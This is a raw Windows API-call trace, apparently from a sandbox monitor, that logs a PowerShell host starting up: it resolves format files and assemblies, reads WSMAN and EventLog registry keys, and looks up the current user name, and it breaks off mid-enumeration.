[0062.733] SetErrorMode (uMode=0x1) returned 0x1 [0062.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0062.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0062.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0062.734] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5b7a7e90, Data2=0xeb7d, Data3=0x4853, Data4=([0]=0xa4, [1]=0x2b, [2]=0x4f, [3]=0xc9, [4]=0x9b, [5]=0x90, [6]=0xaa, [7]=0x35))) returned 0x0 [0062.734] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9aafed2d, Data2=0xe746, Data3=0x41ce, Data4=([0]=0xa1, [1]=0xc5, [2]=0xf9, [3]=0xad, [4]=0x1, [5]=0x91, [6]=0xa9, [7]=0xde))) returned 0x0 [0062.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0062.734] SetErrorMode (uMode=0x1) returned 0x1 [0062.734] SetErrorMode (uMode=0x1) returned 0x1 [0062.734] GetFileType (hFile=0x304) returned 0x1 [0062.734] ReadFile (in: hFile=0x304, lpBuffer=0x3518250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3518250*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.736] ReadFile (in: hFile=0x304, lpBuffer=0x3518250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3518250*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.737] ReadFile (in: hFile=0x304, lpBuffer=0x3518250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3518250*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.737] ReadFile (in: hFile=0x304, lpBuffer=0x3518250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3518250*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.737] ReadFile (in: hFile=0x304, lpBuffer=0x3518250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3518250*, lpNumberOfBytesRead=0x24d238*=0xe98, lpOverlapped=0x0) returned 1 [0062.737] ReadFile (in: hFile=0x304, lpBuffer=0x3517850, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3517850*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.737] ReadFile (in: hFile=0x304, lpBuffer=0x3518250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3518250*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0062.738] SetErrorMode (uMode=0x1) returned 0x1 [0062.738] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0062.738] SetErrorMode (uMode=0x1) returned 0x1 [0062.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0062.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0062.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0062.739] VirtualQuery (in: lpAddress=0x24bd60, lpBuffer=0x24cc20, dwLength=0x30 | out: lpBuffer=0x24cc20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.739] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x3c3b1682, Data2=0x67db, Data3=0x4458, Data4=([0]=0xa6, [1]=0x47, [2]=0x29, [3]=0x5a, [4]=0x31, [5]=0x89, [6]=0x84, [7]=0xd4))) returned 0x0 [0062.739] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe3c92fdc, Data2=0x846d, Data3=0x4832, Data4=([0]=0x9e, [1]=0xba, [2]=0x87, [3]=0x2e, [4]=0x63, [5]=0x6b, [6]=0x8d, [7]=0x95))) returned 0x0 [0062.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0062.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0062.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0062.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0062.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0062.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0062.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0062.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0062.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0062.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0062.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0062.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0062.883] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.884] CoTaskMemFree (pv=0x1b96d2f0) [0062.885] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.885] CoTaskMemFree (pv=0x1b96d2f0) [0062.886] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.886] CoTaskMemFree (pv=0x1b96d2f0) [0062.887] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.887] CoTaskMemFree (pv=0x1b96d2f0) [0062.900] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.900] CoTaskMemFree (pv=0x1b96d2f0) [0062.903] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.903] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.903] CoTaskMemFree (pv=0x1b96d2f0) [0062.903] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.903] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.903] CoTaskMemFree (pv=0x1b96d2f0) [0062.911] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d3dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d3d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d3dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d3d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0062.911] CoTaskMemFree (pv=0x0) [0062.911] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0062.911] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0xe7050, lpcchValueName=0x24d488, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d488, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0062.912] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d46c, lpData=0x0, lpcbData=0x24d468*=0x0 | out: lpType=0x24d46c*=0x1, lpData=0x0, lpcbData=0x24d468*=0x8) returned 0x0 [0062.912] CoTaskMemAlloc (cb=0xc) returned 0x1b96b140 [0062.912] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d43c, lpData=0x1b96b140, lpcbData=0x24d438*=0x8 | out: lpType=0x24d43c*=0x1, lpData="2.0", lpcbData=0x24d438*=0x8) returned 0x0 [0062.968] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d428 | out: phkResult=0x24d428*=0x308) returned 0x0 [0062.968] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d32c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d328, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d32c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d328*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0062.969] CoTaskMemFree (pv=0x0) [0062.969] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0062.969] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0xe7050, lpcchValueName=0x24d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0062.969] CoTaskMemFree (pv=0xe7050) [0062.969] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0062.969] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0xe7050, lpcchValueName=0x24d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0062.969] CoTaskMemFree (pv=0xe7050) [0062.969] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0062.969] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0xe7050, lpcchValueName=0x24d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0062.969] CoTaskMemFree (pv=0xe7050) [0062.969] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d3bc, lpData=0x0, lpcbData=0x24d3b8*=0x0 | out: lpType=0x24d3bc*=0x1, lpData=0x0, lpcbData=0x24d3b8*=0x8) returned 0x0 [0062.969] CoTaskMemAlloc (cb=0xc) returned 0x1b96b180 [0062.969] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d38c, lpData=0x1b96b180, lpcbData=0x24d388*=0x8 | out: lpType=0x24d38c*=0x1, lpData="2.0", lpcbData=0x24d388*=0x8) returned 0x0 [0062.969] CoTaskMemFree (pv=0x1b96b180) [0062.970] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.970] CoTaskMemFree (pv=0x1b96d2f0) [0063.199] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0063.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0063.199] CoTaskMemFree (pv=0x1b96d2f0) [0063.274] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d458 | out: phkResult=0x24d458*=0x30c) returned 0x0 [0063.276] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d3cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d3c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d3cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d3c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.276] CoTaskMemFree (pv=0x0) [0063.277] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.277] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0xe7050, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.670] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x344) returned 0x0 [0063.670] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2 [0063.670] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x348) returned 0x0 [0063.670] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x34c) returned 0x0 [0063.671] RegCloseKey (hKey=0x34c) returned 0x0 [0063.671] RegCloseKey (hKey=0x30c) returned 0x0 [0063.672] RegCloseKey (hKey=0x348) returned 0x0 [0063.772] CoTaskMemAlloc (cb=0x804) returned 0x1b9909e0 [0063.772] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9909e0, nSize=0x24d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d6c8) returned 0x1 [0063.774] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.774] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d708) returned 1 [0063.774] CoTaskMemFree (pv=0xe7050) [0063.844] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x36c) returned 0x0 [0063.844] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2 [0063.845] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x370) returned 0x0 [0063.845] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x374) returned 0x0 [0063.845] RegCloseKey (hKey=0x374) returned 0x0 [0063.845] RegCloseKey (hKey=0x350) returned 0x0 [0063.845] RegCloseKey (hKey=0x370) returned 0x0 [0063.846] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d408 | out: phkResult=0x24d408*=0x370) returned 0x0 [0063.846] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d37c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d378, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d37c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d378*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.846] CoTaskMemFree (pv=0x0) [0063.846] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.846] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.846] CoTaskMemFree (pv=0xe7050) [0063.846] CoTaskMemFree (pv=0x0) [0063.846] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.846] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.846] CoTaskMemFree (pv=0xe7050) [0063.846] CoTaskMemFree (pv=0x0) [0063.846] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.847] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.847] CoTaskMemFree (pv=0xe7050) [0063.847] CoTaskMemFree (pv=0x0) [0063.847] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.847] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.847] CoTaskMemFree (pv=0xe7050) [0063.847] CoTaskMemFree (pv=0x0) [0063.847] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.847] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.847] CoTaskMemFree (pv=0xe7050) [0063.847] CoTaskMemFree (pv=0x0) [0063.847] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.847] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.847] CoTaskMemFree (pv=0xe7050) [0063.847] CoTaskMemFree (pv=0x0) [0063.847] 